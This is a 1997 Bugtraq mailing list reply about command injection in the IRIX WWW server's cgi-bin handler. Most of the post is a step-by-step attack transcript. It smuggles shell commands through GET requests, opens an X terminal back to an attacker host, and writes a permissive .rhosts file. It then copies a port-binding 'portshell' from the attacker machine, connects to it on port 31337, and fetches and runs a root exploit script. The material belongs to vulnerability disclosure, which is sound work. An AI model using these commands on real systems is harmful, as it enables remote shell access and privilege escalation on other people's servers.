|
Bugtraq
mailing list archives
Re: CPSR 7: IRIX WWW Server
From: aaronb () j51 com (Aaron Bornstein)
Date: Thu, 24 Jul 1997 12:59:54 -0400
On Thu, 24 Jul 1997, Thomas Walter wrote:
[snip]
enemy% telnet victim 80
Trying 1.2.3.4...
Connected to victim.
Escape character is '^]'.
GET /cgi-bin/handler/;/usr/sbin/xwsh -display enemy:0 -e
/bin/csh|?data=Download
UX:sh (sh): ERROR: Connection closed by foreign host.
enemy%
And voila! - What else do you want? Any other programs to start? Just
try...
Keep in mind that it isn't necessary to get everything done in one
command. A string of two or three commands might sometimes be necessary
to get things moving. For example:
enemy% whoami
evil_cracker
enemy% echo + + > .rhosts
enemy% nc victim.com 80
GET /cgi-bin/handler/;/usr/bsd/rcp evil_cracker () enemy com:portshell /tmp|?data=Download
enemy% nc victim.com 80
GET /cgi-bin/handler/;/tmp/portshell 31337|?data=Download
enemy% nc victim.com 31337
% whoami
nobody
% rcp evil_cracker () enemy com:irix_root_bug_of_the_week.sh \
./irbotw.sh ; ./irbotw.sh
#
[... or whatever ...]
"portshell" being a program that bound itself to a TCP port and executed a
shell upon receiving a connection. Boom, shell access obtained under
whatever uid httpd is running as. Or, one could even create a dummy
inetd.conf and run their own copy of inetd. The possiblities are
virtually limitless.
--Aaron
- -- --- ---- - Aaron Bornstein : aaronb at j51 dot com - ---- --- -- -
Never let your schooling interfere with your education
 By Date 
By Thread
Current thread:
| 
Intro
